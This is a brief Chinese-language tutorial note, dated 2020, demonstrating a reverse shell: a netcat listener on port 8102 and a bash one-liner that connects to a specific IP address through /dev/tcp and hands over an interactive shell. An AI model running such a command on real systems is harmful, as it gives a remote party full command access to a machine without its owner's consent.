反弹Shell演示实例 郝伟 2020/11/15 [TOC]

1. 本机，目标机

1. 本机开监听服务，如7777
2. 本机执行攻击脚本
3. 如果执行成功，监听程序会进行命令行待执行状态，此时可以执行各类命令

2. 模拟

本机执行：

$ nc -lvp 8102

目标机执行：

$ bash -i >& /dev/tcp/121.199.10.158/8102 0>&1

3. 结果

执行安排以后，本机即可将本地执行的命令，直接在目标机器上执行，并返回执行结果。

参考此文：https://www.cnblogs.com/iouwenbo/p/11277453.html